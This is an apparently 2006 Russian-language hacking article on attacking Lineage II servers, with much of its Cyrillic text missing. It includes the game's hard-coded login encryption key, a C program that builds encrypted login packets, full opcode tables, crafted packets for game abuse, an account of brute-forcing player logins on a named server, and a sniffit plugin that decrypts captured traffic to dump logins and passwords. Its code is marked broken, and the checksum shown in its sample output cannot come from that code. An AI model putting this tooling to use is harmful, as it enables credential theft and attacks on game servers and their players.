// LineAge II: breaking the laws
// publishing date: 17.07.06
// darkgrey / d4rk@securitylab.ru
// m00.blackhat.ru

I. 

II. Login-

    1.  
    2.  
    3.  RequestAuthLogin-  

III. Game-.

    1.    
    2.  
    3. 
    4. xID  ObjectID
    5.  :
         a) /
         b) 
         c) OID  IID
         d)   NPC    

IV.      

    1.    -  
    2.  
    3.    lineage2 
    4.  "" login-
    5. 
    6.  ""   
    7. 
    8. 'remote DoS'    
    9. integer overflow    l2j
    10. SQL-injection
    11.  (   100%- enchant')
    12.  (  )
    13.   SocialAction (0x1b)
    14.   Ride (0x6a)
    15.    
    16.   RequestRestartPoint (    )
    17.       ,   -   ?
    18. 

V.   

VI.    4

VII. 

VIII. 

IX.   



I. .

   lineage?     (?)  - MMORPG
(Massively Multiplayer Online Role-Playing Game).       
  ,    =). ,     
, ..    ""  lineage, , ,
    www.lineageii.ru (    
10 000 )   www.lineage2.com (  100 000,  ,   )
 ,     .
    ,  (     RPG)       
 ,     , , , .  ,   
            .  ,
       ,       -
       (,   lineage   ).
   online (    online) , lineage  
.     ,  -   
     .
      . -,    .  
 ,   ,     . -,
 ,  ,        
  ,      (     ).  
 ,  , ,     ,  
     .    
  ,          ,
       lineage.   ,    
 ( ),        
 300$ (  www.antaras.ru)  5 000$   .  -
        . ,  
N-     ,    1     .
     .
 ,  -    )   ,  . 
,    (      ,  
)    -   -   . -  ,
-    ,    ,  .
  ,       ,       
 (    ),        ,
        .   ?
 , ,   (   bugtraq)  
   lineage. ,    ,   
  . 
 ,       -   
 Half-Life (www.securitylab.ru/analytics/216301.php).    
       ,      .    
      lineage2,    
,      (    ),  
  ,           
,       =)

.
1.  ,        half-life,   
   .     .
2.          
 "" lineage2  l2j,   . ,  100%
  l2j,    ,  l2j    =)
3.     linux.     blowfish.   openssl
package     .
4.    .  ,   ,    
 ,     .     ,   
   .
5.  .        ( )  
     4  lineage2      .
 4     .


II. Login-.

.
  ,   lineage2     ,   
       .  ,    
 (,    3  lineage     )   
  .  ,   ,      =)
      ,        ,
  -  ,      .  ,     
    ,          
  .

1.  . 
  ,  login-   , lineage  blowfish.
,   ,       1993 .  blowfish  ,
    .  - ,    1 
,   / .      blowfish,   
   18 32-   4   256 32-  .
,   , / . 
  - ,  blowfish    ( 8 ).    ,
     ,    -  .
  lineage,  ,  ,     ,
       l2j (    99% 
lineage,  ,         - .  
).    ,   2    ___.
,  ,  ,  .  .

2.  .
    (,   )     (   halflife).
        . -  :
0x00 - RequestAuthLogin (   -    )
0x02 - RequestServerLogin (    )
0x05 - RequestServerList (   )
     ,     .   
  :
0x01 -   
0x03 -   
0x04 -   RequestServerLogin
0x06 -   RequestServerList
       ,     -   .
      . ,   
      0x01,      , 
    (  : 0x03 -    , 0x07 - - 
 , 0x11 -   ).          .
,  RequestAuthLogin      .
  -  ,     ,   , 
 . , ,  "RequestAuthLogin"      .
    8  .     ,   
,        .       ?
    32- .  XOR'  .   
XOR'      .      .

3.    
,     ,     ,  
 .

/*

 la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor
 
 Helps to understand lineage2 authentification.
 
 darkgrey / m00.blackhat.ru

 ~broken
*/

#include <stdint.h>
#include <stdio.h>
#include <string.h>

#include "/usr/local/include/blowfish.h"

// Byte length of the Blowfish key below (the string's NUL is not part of it).
#define KEY_LEN 20
// Payload length of the RequestAuthLogin packet; the wire packet is
// AUTH_PKT_LEN + 2 bytes once the 2-byte length prefix is counted.
#define AUTH_PKT_LEN 0x30

// Hard-coded Blowfish key expanded into sub-keys by BF_set_key() in main().
// The identical literal appears in the sniffer plugin later in this article:
// a static key shared by every copy of the program gives no confidentiality
// against anyone who holds the file.
char key[] = "[;'.]94-31==-&%@!^+]";

// Expanded key schedule (OpenSSL BF_KEY: 18 P-array words and 4 S-boxes),
// filled by BF_set_key() before build_auth_packet() encrypts with it.
BF_KEY bfkey;

// ,        
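// Write a 4-byte XOR "checksum" of raw[0..count) at raw[count..count+3].
//
// Every complete 4-byte group is folded into one word by OR-ing its bytes
// (as in the published version: the bytes go through plain char, so on a
// signed-char platform values >= 0x80 sign-extend) and the words are XOR-ed
// together.  The result is stored with memcpy in host byte order, so the
// caller must provide at least count + 4 writable bytes; a trailing group
// shorter than 4 bytes is ignored instead of being read past count.
//
// NOTE(review): OR-ing bytes fills at most the low byte of each word (unless
// a byte is >= 0x80), so this loop cannot yield the 0x224a0377 shown in the
// sample dump — consistent with the "~broken" marker in the file header.
// The algorithm is kept as published; only the integer width, the printf
// format (the original passed a long to %x) and the missing return are
// made well-defined.
//
// Returns 0, or -1 when raw is NULL.
int add_ckecksum(char *raw, int count) {
	uint32_t chksum = 0;

	if (raw == NULL) {
		return -1;
	}

	for (int i = 0; count - i >= 4; i += 4) {
		uint32_t word = (uint32_t)raw[i];
		word |= (uint32_t)raw[i + 1];
		word |= (uint32_t)raw[i + 2];
		word |= (uint32_t)raw[i + 3];
		chksum ^= word;
	}

	printf("checksum: 0x%x\n", (unsigned)chksum);
	memcpy(raw + count, &chksum, sizeof chksum);
	return 0;
}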

//       (   
//   )
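// Copy the login and password into their fixed-size fields of the
// RequestAuthLogin skeleton: 14 bytes at raw+3 and 16 bytes at raw+17
// (the widths laid out in build_auth_packet()).  Longer strings are cut to
// the field; shorter ones leave the rest untouched, so the caller must pass a
// zero-filled skeleton.  The inputs are never written to: the published code
// stored l[15] and p[17], which overruns short caller buffers (main() passes
// 4- and 6-byte arrays).
//
// raw must point at a buffer of at least 33 bytes.
// Returns 0, or -1 if any argument is NULL.
int add_lp(char *raw, const char *l, const char *p) {
	enum { LOGIN_OFF = 3, LOGIN_LEN = 14, PWD_OFF = 17, PWD_LEN = 16 };

	if (raw == NULL || l == NULL || p == NULL) {
		return -1;
	}

	size_t llen = strlen(l);
	size_t plen = strlen(p);
	memcpy(raw + LOGIN_OFF, l, llen < LOGIN_LEN ? llen : LOGIN_LEN);
	memcpy(raw + PWD_OFF, p, plen < PWD_LEN ? plen : PWD_LEN);
	return 0;
}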

//        ( )
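// Hex-dump the first len + 2 bytes of raw — the 2-byte length prefix plus
// len payload bytes, matching the AUTH_PKT_LEN convention — 16 per row with
// the row offset on the left, after a 54-character underline.
//
// Returns the number of bytes dumped: len + 2, or 0 when raw is NULL or
// len + 2 is not positive (the underline and trailing newlines are still
// printed, as in the published version, which also declared int but never
// returned).
int print_packet(char *raw, int len) {
	int total = (raw != NULL && len > -2) ? len + 2 : 0;

	for (int i = 0; i < 54; i++) {
		printf("_");
	}
	for (int i = 0; i < total; i++) {
		if (i % 0x10 == 0) {
			printf("\n0x%.2x | ", i);
		}
		printf("%.2x ", raw[i] & 0xFF);   // mask: char may be signed
	}
	printf("\n\n");
	return total;
}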

//  ,   
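// Build a C3 RequestAuthLogin packet for the given login and password, dump
// it, Blowfish-encrypt the payload in place and dump it again.
//
// Layout (2-byte length prefix + 0x30 payload): opcode 0x00, 14-byte login,
// 16-byte password, one 0x08 byte, 8 bytes of unknown meaning, a 4-byte slot
// that add_ckecksum() fills, and a final 4-byte zero trailer.  The payload
// (everything after the prefix) is encrypted 8 bytes at a time with the
// global bfkey, which main() must already have set up.
//
// Each block is copied through an aligned BF_LONG[2] instead of casting an
// odd char offset to BF_LONG * as the published code did (a misaligned and
// aliasing access); the bytes produced are the same.  This assumes BF_LONG
// is 32 bits wide so that two of them cover one 8-byte block — TODO confirm
// against the installed blowfish.h.
//
// Returns 0.
int build_auth_packet(char *login, char *pwd) {
	enum { BLOCK = 8 };
	int count = AUTH_PKT_LEN / BLOCK;
	char packet_skeleton[] =
		// RequestAuthLogin skeleton; zero where add_lp()/add_ckecksum() fill in
		"\x32\x00" // total length: 0x30 + 0x02
		"\x00" // opcode (0x00 - RequestAuthLogin)
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // login
		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" // password
		"\x08" // byte following the login/password fields (meaning not documented)
		"\x00\x00\x00\x00\x00\x00\x00\x00" // c3-specific bytes (?)
		"\x00\x00\x00\x00" // checksum slot, written by add_ckecksum()
		"\x00\x00\x00\x00";

	add_lp(packet_skeleton, login, pwd);

	// checksum covers the payload minus the two 4-byte trailers
	add_ckecksum(packet_skeleton + 2, AUTH_PKT_LEN - 8);

	printf("Auth packet dump (non-crypted):\n");
	print_packet(packet_skeleton, AUTH_PKT_LEN);

	// encrypt the payload after the 2-byte length prefix, block by block
	for (int i = 0; i < count; i++) {
		BF_LONG block[2] = {0, 0};
		char *at = packet_skeleton + 2 + i * BLOCK;
		memcpy(block, at, BLOCK);
		BF_encrypt(block, &bfkey, BF_ENCRYPT);
		memcpy(at, block, BLOCK);
	}

	printf("Auth packet dump (encrypted):\n");
	print_packet(packet_skeleton, AUTH_PKT_LEN);
	return 0;
}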



// Entry point: expand the static key into the global bfkey schedule, then
// build and dump a sample RequestAuthLogin packet for a fixed login/password.
int main(void) {
	char login[] = "m00";   // sample login
	char pwd[] = "ownzu";   // sample password

	printf("\nla2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor\n\n");

	// derive the 18 P / 4 S sub-keys from the hard-coded key
	BF_set_key(&bfkey, KEY_LEN, key);

	build_auth_packet(login, pwd);
	return 0;
}
/* eof */

        :

bash-2.05b$ ./a.out

la2-example.c ~ LineAge2 c3 RequestAuthLogin packet constructor

checksum: 0x224a0377
Auth packet dump (non-crypted):
______________________________________________________
0x00 | 32 00 00 6d 30 30 00 00 00 00 00 00 00 00 00 00
0x10 | 00 6f 77 6e 7a 75 00 00 00 00 00 00 00 00 00 00
0x20 | 00 08 00 00 00 00 00 00 00 00 77 03 4a 22 00 00
0x30 | 00 00

Auth packet dump (encrypted):
______________________________________________________
0x00 | 32 00 09 d9 97 e2 29 89 8c b5 1a a0 1a 83 74 43
0x10 | 39 fc 2f 03 c3 26 9c 65 b0 c4 20 28 11 c1 6a 95
0x20 | 3e 44 45 46 2a ae b9 18 91 2e 75 56 d0 dc 40 b5
0x30 | 77 2a

bash-2.05b$


III. Game-

1.    login-    game-.
       .
1)          11  (     ).
2)    RequestAuthLogin 
3)   ,     32-     (  ) - 
  SessionKey #1.
4)   RequestServerList,       ,  ,
,   ,   .
5)   RequestServerLogin,      AccessLevel (   -1,   )
     , ,    ,  
32- SessionKey #2,       game-.
     ,    (       )
 - ,   .
6)   ,    .     (  3   ,
 ),     12-  ,   4  , 
   4-  ( )   64-  .   
       .  ,   
() ,       .
7)       (   ),     
 login-.     .
 ,  7      =) ,  .
,  -    :        ?  
 .     .


2.  
    ,     lineage  64- . 
 4       game-,  -.   N- 
  , XOR'  N-  .    XOR' (N-1)- 
    0xFF.       " ".
         .  ,   
  ,   .   ,        
    ,    ,     
.   ,  .        .
   ,     .     ,
  4-     .  ,    ( 
   ) ,         game-,
    .       ,    .
 ,      ~423 .   
,     - 10 000    ( 
 )      12 .         
 .
     ? ,  ,   . ,  
 TCP (   UDP      halflife),   -  ""  
 .



3. .
    login-,      .     .
  ,    3  lineage2 (  ):
//  login-
0x01 loginfail2 
0x02 accountKicked1 
0x03 loginok 
0x04 serverlist 
0x05 serverfail 
0x06 playfail 
0x07 playok 
0x08 accountKicked 
0x09 blockedAccMsg  //  
0x20 protocol version different 
0x00 VersionCheck 

//  game-
0x01 MoveToLocation  
0x02 NpcSay 
0x03 CharInfo //     
0x04 UserInfo 
0x06 Attack 
0x07 Attack 
0x08 Attacked 
0x09 Attacked 
0x0a AttackCanceld 
0x0b Die 
0x0c Revive 
0x0d AttackOutOfRange 
0x0e AttackInCoolTime 
0x0f AttackDeadTarget
0x10 LeaveWorld 
0x11 AuthLoginSuccess
0x12 AuthLoginFail
0x13 CharList //  
0x15 SpawnItem //   3    
0x16 DropItem //   3    
0x17 GetItem 
0x18 EquipItem 
0x19 UnequipItem 
0x1a StatusUpdate 
0x1b NpcHtmlMessage //   3     ItemID   ObjectID
0x1c SellList 
0x1d BuyList 
0x1e DeleteObject 
0x1f CharSelectInfo
0x20 LoginFail 
0x21 CharSelected
0x22 NpcInfo 
0x23 NewCharacterSuccessPacket 
0x24 NewCharacterFailPacket 
0x25 CharCreateOk 
0x26 CharCreateFail 
0x27 ItemList 
0x28 SunRise 
0x29 SunSet 
0x2a EquipItemSuccess // 
0x2b EquipItemFail // 
0x2c UnEquipItemSuccess // 
0x2d UnEquipItemFail // 
0x2e TradeStart 
0x2f TradeStartOk // 
0x30 TradeOwnAdd 
0x31 TradeOtherAdd 
0x32 TradeDone 
0x33 CharDeleteSuccess 
0x34 CharDeleteFail 
0x35 ActionFail 
0x36 ServerClose 
0x37 InventoryUpdate 
0x38 TeleportToLocation 
0x39 TargetSelected 
0x3a TargetUnselected 
0x3b AutoAttackStart 
0x3c AutoAttackStop 
0x3d SocialAction 
0x3e ChangeMoveType 
0x3f ChangeWaitType 
0x40 NetworkFail // 
0x43 CreatePledge 
0x44 AskJoinPledge 
0x45 JoinPledge 
0x46 WithdrawalPledge 
0x47 OustPledgeMember 
0x48 SetOutPledgeMember 
0x49 DismissPledge 
0x4a SetDismissPledge 
0x4b AskJoinParty 
0x4c JoinParty 
0x4d WithdrawalParty 
0x4e OustPartyMember 
0x4f SetOustPartyMember 
0x50 DismissParty 
0x51 SetDismissParty 
0x52 MagicAndSkillList 
0x53 WarehouseDepositList 
0x54 WarehouseWithdrawalList 
0x55 WarehouseDone 
0x56 ShortCutRegister 
0x57 ShortCutInit 
0x58 ShortCutDelete 
0x59 StopMove 
0x5a MagicSkillUser 
0x5b MagicSkillCanceld 
0x5d CreatureSay 
0x5e EquipUpdate 
0x5f StopMoveWithLocation 
0x60 DoorInfo 
0x61 DoorStatusUpdate 
0x63 PartySmallWindowAll 
0x64 PartySmallWindowAdd 
0x65 PartySmallWindowDeleteAll 
0x66 PartySmallWindowDelete 
0x67 PartySmallWindowUpdate 
0x68 PledgeShowMemberListAll 
0x69 PledgeShowMemberListUpdate 
0x6a PledgeShowMemberListAdd 
0x6b PledgeShowMemberListDelete 
0x6c MagicList // 
0x6d SkillList 
0x6e VehicleInfo 
0x6f VehicleDeparture 
0x70 VehicleCheckLocation 
0x71 GetOnVehicle 
0x72 GetOffVehicle 
0x73 TradeRequest 
0x74 RestartResponse 
0x75 MoveToPawn 
0x76 SetTo 
0x77 StartRotating 
0x78 FinishRotating 
0x79 MoveBackwardToLocation //     to_the_nearest_village  
0x7a SystemMessage 
0x7d StartPledgeWar 
0x7e ReplyStartPledgeWar 
0x7f StopPledgeWar 
0x80 ReplyStopPledgeWar 
0x81 SurrenderPledgeWar 
0x82 ReplySurrenderPledgeWar 
0x83 SetPledgeCrest // 
0x84 PledgeCrest 
0x85 SetupGauge 
0x86 ShowBoard 
0x87 ChooseInventoryItem 
0x89 MoveToLocationInVehicle 
0x8a StopMoveInVehicle 
0x8b ValidateLocationInVehicle 
0x8c TradeOtherAdd2 
0x8d TradePressOwnOK // 
0x8e MagicSkillLaunched 
0x8f FriendAddRequestResult 
0x90 FriendAdd  // 
0x91 FriendRemove // 
0x92 FriendList // 
0x93 FriendStatus // 
0x94 TradePressOtherOk // 
0x95 FriendAddRequestResult2 
0x96 LeaveWorld2 
0x97 AbnormalStatusUpdate 
0x98 QuestList 
0x99 EnchantResult 
0x9a AuthServerList // 
0x9b PledgeShowMemberListDeleteAll 
0x9c PledgeInfo 
0x9d PledgeExtendedInfo 
0x9e SurrenderPersonally 
0x9f Ride 
0xa1 PledgeShowInfoUpdate 
0xa2 ClientAction 
0xa3 AquireSkillList 
0xa4 AquireSkillInfo 
0xa5 ServerObjectInfo 
0xa6 HideGm 
0xa7 AquireSkillDone 
0xa8 GMViewCharacterInfo 
0xa9 GMViewPledgeInfo 
0xaa GMViewSkillInfo 
0xab GMviewMagicInfo 
0xac GMViewQuestInfo 
0xad GMViewItemList 
0xae GMViewWarehouseWithdrawList 
0xaf PartyMatchList 
0xb0 PartyMatchDetail 
0xb1 PlaySound 
0xb2 StaticObject 
0xb3 PrivateSellList2 
0xb4 PrivateBuyList2 
0xb5 PrivateStoreMsg 
0xb6 ShowMinimapPacket 
0xb7 ReviveRequest // 
0xb8 AbnormalVisualEffect 
0xb9 TutorialShowHtml 
0xba TutorialShowQuestionMark 
0xbb TutorialEnableClientEvent 
0xbc TutorialClose 
0xbd ShowRadar 
0xbe DeleteRadar 
0xbf MyTargetSelected 
0xc0 PartyMemberPosition 
0xc1 AskJoinAlliance 
0xc2 JoinAlliance 
0xc3 WithdrawAlliance 
0xc4 OustAllianceMemberPledge 
0xc5 DismissAlliance 
0xc6 SetAllianceCrest // 
0xc7 ReceiveAllyCrest 
0xc8 ServerCloseSocket // 
0xc9 PetStatusShow 
0xca PetInfo 
0xcb PetItemList 
0xcc PetInventoryUpdate 
0xcd AllianceInfo // 
0xce PetStatusUpdate 
0xcf PetDelete 
0xd0 PrivateSellList 
0xd1 PrivateBuyList 
0xd2 PrivateStoreMsg 
0xd3 VehicleStart 
0xd4 RequestTimeCheck 
0xd5 StartAllianceWar 
0xd6 ReplyStartAllianceWar // 
0xd7 StopAllianceWar 
0xd8 ReplyStopAllianceWar //  
0xd9 SurrenderAllianceWar // 
0xda SkillCoolTimePacket 
0xdb PackageToListPacket 
0xdc PackageSendableListPacket 
0xdd EarthQuake 
0xde FlyToLocation 
0xdf BlockList // 
0xe0 SpecialCamera 
0xe1 NormalCamera 
0xe2 CastleSiegeInfoPacket 
0xe3 CastleSiegeAttackerList 
0xe4 CastleSiegeDefenderList 
0xe5 NickNameChanged 
0xe6 PledgeStatusChanged 
0xe7 RelationChanged 
0xe8 OnEventTrigger 
0xe9 MultiSellListPacket 
0xea SetSummonRemainTime 
0xeb OnSkillRemainSec 
0xec NetPingPacket 

  :
0x01 MoveBackwardToLocation 
0x02 Say 
0x03 EnterWorld 
0x04 Action 
0x08 RequestAuthLogin
0x09 Logout 
0x0a Attack 
0x0b CharacterCreate
0x0c CharacterDelete
0x0d CharacterSelect
0x0e NewCharacter 
0x0f ItemList 
0x10 RequestEquipItem 
0x11 RequestUnEquipItem 
0x12 RequestDropItem 
0x12 RequestDropItemFromPet 
0x14 UseItem 
0x15 TradeRequest 
0x16 AddTradeItem 
0x17 TradeDone 
0x1a RequestTeleport 
0x1b SocialAction 
0x1c ChangeMoveType // .   'RequestActionUse' 
0x1d ChangeWaitType // .   'RequestActionUse' 
0x1e RequestSellItem 
0x1f RequestBuyItem 
0x20 RequestLinkHtml 
0x21 RequestBypassToServer 
0x22 RequestBBSwrite 
0x23 RequestCreatePledge 
0x24 RequestJoinPledge 
0x25 RequestAnswerJoinPledge 
0x26 RequestWithDrawalPledge 
0x27 RequestOustPledgeMember 
0x28 RequestDismissPledge 
0x29 RequestJoinParty 
0x2a RequestAnswerJoinParty 
0x2b RequestWithDrawalParty 
0x2c RequestOustPartyMember 
0x2d RequestDismissParty 
0x2e RequestMagicSkillList 
0x2f RequestMagicSkillUse 
0x30 Appearing 
0x31 SendWareHouseDepositList 
0x32 SendWareHouseWithDrawList 
0x33 RequestShortCutReg 
0x34 RequestShortCutUse 
0x35 RequestShortCutDel 
0x37 RequestTargetCancel 
0x38 Say2 //  (   - la2.ru -  0x39)
0x3c RequestPledgeMemberList 
0x3e RequestMagicList 
0x3f RequestSkillList 
0x41 MoveWithDelta 
0x42 GetOnVehicle 
0x43 GetOffVehicle 
0x44 AnswerTradeRequest 
0x45 RequestActionUse 
0x46 RequestRestart 
0x47 RequestSiegeInfo 
0x48 ValidatePosition 
0x49 RequestSEKCustom 
0x4a StartRotating 
0x4b FinishRotating 
0x4d RequestStartPledgeWar 
0x4e RequestReplyStartPledgeWar 
0x4f RequestStopPledgeWar 
0x50 RequestReplyStopPledgeWar 
0x51 RequestSurrenderPledgeWar 
0x52 RequestReplySurrenderPledgeWar 
0x53 RequestSetPledgeCrest 
0x55 RequestGiveNickName  //      CL'.    ..
0x57 RequestShowboard 
0x58 RequestEnchantItem 
0x59 RequestDestroyItem 
0x5b SendBypassBuildCmd 
0x5e RequestFriendInvite 
0x5f RequestFriendAddReply 
0x60 RequestFriendList 
0x61 RequestFriendDel 
0x62 CharacterRestore 
0x63 RequestQuestList 
0x64 RequestDestroyQuest 
0x66 RequestPledgeInfo 
0x67 RequestPledgeExtendedInfo 
0x68 RequestPledgeCrest 
0x69 RequestSurrenderPersonally 
0x6a Ride 
0x6b RequestAcquireSkillInfo 
0x6c RequestAcquireSkill 
0x6d RequestRestartPoint 
0x6e RequestGMCommand 
0x6f RequestPartyMatchConfig 
0x70 RequestPartyMatchList 
0x71 RequestPartyMatchDetail 
0x72 RequestCrystallizeItem 
0x73 RequestPrivateStoreManage 
0x74 SetPrivateStoreList 
0x75 RequestPrivateStoreManageCancel 
0x76 RequestPrivateStoreQuit 
0x77 SetPrivateStoreMsg 
0x78 RequestPrivateStoreList 
0x79 SendPrivateStoreBuyList 
0x7a ReviveReply 
0x7b RequestTutorialLinkHtml 
0x7c RequestTutorialPassCmdToServer 
0x7d RequestTutorialQuestionMark 
0x7e RequestTutorialClientEvent 
0x7f RequestPetition 
0x80 RequestPetitionCancel 
0x81 RequestGMList 
0x82 RequestJoinAlly 
0x83 RequestAnswerJoinAlly 
0x84 RequestWithdrawAlly 
0x85 RequestOustAlly 
0x86 RequestDismissAlly 
0x87 RequestSetAllyCrest 
0x88 RequestAllyCrest 
0x89 RequestChangePetName 
0x8a RequestPetUseItem 
0x8b RequestGiveItemToPet 
0x8c RequestGetItemFromPet 
0x8e RequestAllyInfo 
0x8f RequestPetGetItem 
0x90 RequestPrivateStoreBuyManage 
0x91 SetPrivateBuyList 
0x92 RequestPrivateStoreBuyManageCancel 
0x93 RequestPrivateStoreBuyQuit 
0x94 SetPrivateBuyMsg 
0x95 RequestPrivateStoreBuyList 
0x96 SendPrivateStoreBuyBuyList 
0x97 SendTimeCheckPacket 
0x98 RequestStartAllianceWar 
0x99 ReplyStartAllianceWar 
0x9a RequestStopAllianceWar 
0x9b ReplyStopAllianceWar 
0x9c RequestSurrenderAllianceWar 
0x9d RequestSkillCoolTime 
0x9e RequestPackageSendableItemList 
0x9f RequestPackageSend 
0xa0 RequestBlock 
0xa1 RequestCastleSiegeInfo 
0xa2 RequestCastleSiegeAttackerList 
0xa3 RequestCastleSiegeInfo 
0xa4 RequestJoinCastleSiege 
0xa5 RequestConfirmCastleSiegeWaitingList 
0xa6 RequestSetCastleSiegeTime 
0xa7 RequestMultiSellChoose 
0xa8 NetPing


 ,       Request,    "".
, ,      :      ,
 //npc  .  ,  -  (,   )  "". 
 .


4. XID  ObjectID
  (, NPC)     16/32-  ( - 8- ).
   , , ,     2/4-  ,   -  :
"Crystal Scroll: Enchant Weapon (Grade B)"   NPC  "Magister MacTePqpJlOMaCTeP".   , 
      .       NPC/
     ,       .  ,    
 ,      -    ,      .

     32-  Object ID.     ,  
  ,    ,   OID.  OID     
OID  -1.   OID    ,   .  , OID
,        .  , , 
 ,      .     ,  
   ( 0xFFFFFFFF  0x00000000)   ,    OID  
 ,      (     ).
   ,   OID    :)     ,   OID
~4.3  ,    ,      -  -  
(   ).   ,  - .    ,  , , 
  la2  ( )    .      ?
  , OID     .     .
  NPC, OID       ,    NPC  .  OID    .


5.  .

a)  
 ,     ,    3- .
 0x94 (SetPrivateBuyMsg).        ,  
        (,    ).  :

// SetPrivateStoreBuyMsg 
XX XX   //  
94      //  
41 00 41 00 41 00 42 00 42 00 42 00 // .       null-.
00 00   //  

    0x91 (SetPrivateBuyList).       ,Item ID
 . :

// SetPrivateStoreList 
XX XX        //  
91           //  
01 00 00 00  //  
//  
e1 02 00 00  // Item ID
00 00
01 00 00 00  //     
e8 03 00 00  // 
//  

   .      1   IID 0x2e1 (Scroll of Resurrection)  1000 .
    0x1d.    :

XX XX       //  
1d          // 
01 00 00 00 // - 

  ,       .   'SetPrivateBuyMsg' 
'SetPrivateStoreMsg',   'SetPrivateBuyList' - 'SetPrivateStoreList' .
,   ,  Item ID  Object ID,     -  .


b)  
   .

XX XX       //  
38          //   (Say2)
42 00 42 00 42 00 42 //  (BBBB)
00 00 00 02 00 00 00 //  =)
41 00 41 00 41 00 41 //  ()
00 00 00    // 


c)          ,    . ,  
    Item ID  Object ID.

XX XX //  

1b //   (0x1b  antaras.ru)
00 00 

05 00 //  

04 00       //  
1e 26 14 40 // Object ID
d4 15 00 00 // Item ID (0x15d4 - Tutorial Guide)
01 00 00 00 // 
05 00 00 00 00 00 00 00 00 00 00 00 00 00 // ,  ,      -

01 00       //  
1d 26 14 40 // Object ID
7b 04 00 00 // Item ID (0x47b - Squire's pants)
01 00 00 00 // 
01 00 00 00 00 00 00 08 00 00 00 00 00 00 

01 00       //  
1c 26 14 40 // Object ID
7a 04 00 00 // Item ID (0x47a - Squire's Shirt)
01 00 00 00 // 
01 00 00 00 00 00 00 04 00 00 00 00 00 00 

00 00       //  
1b 26 14 40 // Object ID
0a 00 00 00 // Item ID (0x0a - dagger)
01 00 00 00 // 
00 00 00 00 00 00 80 00 00 00 00 00 00 00 

00 00       //  
1a 26 14 40 // Object ID
42 09 00 00 // Item ID (0x942 - Guild Member's Club)
01 00 00 00 // 
00 00 00 00 00 00 80 00 00 00 00 00 00 00 


d)   NPC    
 ,    NPC     :

04 //   (Action)
51 14 10 48 // OID NPC
//    __ 
c6 51 01 00 // X
52 45 02 00 // Y
b8 f2 ff ff // Z
00 // 

     -  NPC.     ,    
 .
,           "Learn skills",    
 :

21 //   (RequestBypassToServer)
6c 00 65 00 61 00 72 00 6e 00 5f 00 73 00 6b 00 69 00 6c 00 6c 00 00 // learn_skill
00 // 

    ,          :

6b //   (RequestAcquireSkillInfo)
10 00 00 00 //  
09 00 00 00 // 

   ,     ,    0x63 (RequestAcquireSkill)



IV.      

1.    -  
           .   
   ,      .      
  .
   www.antaras.ru - ,   lineage2 C1OFF 
(   3).     (  non-blocking sockets),  
 ,    (   )  , 
  ,        'http://antharas.ru/?id=2'.
      123456789, 0987654321 ( antaras.ru  
 8  -    -),   ,    
 , ~1500 .      ,  
  . ,      50 . ,  ,  
   ,     .    ...
 ,   ,  ,    1   ()
  400$ ,    -   . ,  ,  
"",  " ". ,   ,       ,  
     ;)   .

 3       .
-,        ,      
,       ,  -  :/   
   ,      . ,    ,  ,
,         ,     ,   
   ,        (  - )  .
  ,      ,   .
-,  != .     ,    ,  
  .           "" ,  
      NICKNAME  LOGINNAME,    -  
NICKNAME      NICKNAME   ,      
 .
-,       ,       
,    .   ?     , , 
,  , :
  ,   ,   .       ,
       -      -     .  
,   ""        
   .
 ,    ,         , 
      ,       .  
    ,          ,  
  .  ..   ,     ,   
 ,      ,    ,
      .
,      Lineage2 ,     ...
       - la2brute.5bb.ru.
 ,      ,       .
 ,      (-   2006-),     
  30-50   ,      4-5  .
 ,  ,   ,  -   ,  la2.abyss.ru.
   ,   antaras.ru   -    5   40-
  .     ,     ,  
 .



2.  
    , ,        , .
  ,      P  S   Blowfish  
521 .        ,     
 .    ,  l2j   !    , l2j  
  !   ,    (        ),  l2j
,       .
    ,           ,
   .         blowfish'?

    sniffit  0.3.7.beta,      , 
     /  lineage2 . 

====> la2_plugin.plug <====
/*

 Sniffit 0.3.7.beta LineAge2 c3 plugin
 Allows to catch and decode la2 RequestAuthLogin packets *on the fly*
 and dump login/passwords.
 
 by darkgrey / m00.blackhat.ru

 ~broken
*/

#include "/usr/local/include/blowfish.h"
/* Byte length of the Blowfish key below (the string's NUL is not part of it). */
#define KEY_LEN 20

/* Key schedule produced by BF_set_key() in init_la2_plugin() and used by
   PL_la2_plugin() to decrypt captured payloads. */
BF_KEY bfkey;

/* The same hard-coded key literal as in la2-example.c.  A static key gives no
   confidentiality against any party holding it — which is exactly what lets
   this plugin recover the login exchange, and why a defender should treat
   such traffic as effectively plaintext. */
char key[] = "[;'.]94-31==-&%@!^+]";

/* Plugin initialisation hook: announce the plugin on stdout and expand the
   static key into the global bfkey schedule used by PL_la2_plugin(). */
void init_la2_plugin(void) {
	fputs("LineAge2 C3 plugin enabled\n\n", stdout);
	BF_set_key(&bfkey, KEY_LEN, key);
}

/* Per-packet hook called by sniffit for every captured packet.
 *
 * Only packets whose payload is exactly 0x32 bytes — the size of a C3
 * RequestAuthLogin packet (see la2-example.c) — and whose UDP_len is 0
 * (presumably TCP) are handled.  For those it prints the IP destination,
 * Blowfish-decrypts the payload after the 2-byte length prefix in place with
 * the static key, and prints the login and password fields.
 *
 * Detection note: the match is on payload length alone, so any other
 * 0x32-byte payload is also "decrypted" and printed; it is the static key,
 * not this code, that makes the credentials recoverable.  The per-packet
 * struct layout (Plugin_data, PL_info, PL_iphead) comes from sniffit and is
 * not shown here.
 */
void PL_la2_plugin (struct Plugin_data *PLD) {
	int i = 0;
	int count = (PLD->PL_info.DATA_len - 2) / 8;   /* 8-byte Blowfish blocks after the prefix */
	char *ptr = PLD->PL_data;
	unsigned char *ls_ip;
	
	if(PLD->PL_info.DATA_len == 0x32 && PLD->PL_info.UDP_len == 0) {
		ls_ip=(unsigned char *)&(PLD->PL_iphead.destination);
		printf("Login Server ip: %u.%u.%u.%u\n",ls_ip[0],ls_ip[1],ls_ip[2],ls_ip[3]);
		
		/* same (short*)+1 arithmetic as la2-example.c: byte offset 2, then
		   8 bytes per block; the cast to BF_LONG * is unaligned */
		for(i = 0; i < count; i++)
			BF_encrypt((BF_LONG *)((short*)ptr+1+i*4), &bfkey, BF_DECRYPT);
			
		/* NOTE(review): both loops use `||`, so each ends only when its two
		   conditions hold at the same time; if that never happens (no NUL at
		   the expected offset, or no 0x08 after the password) the index keeps
		   growing past the packet — an out-of-bounds read.  Also, i is
		   incremented before the byte is printed, so each loop prints the
		   byte after the one it tested.  Kept as published ("~broken"). */
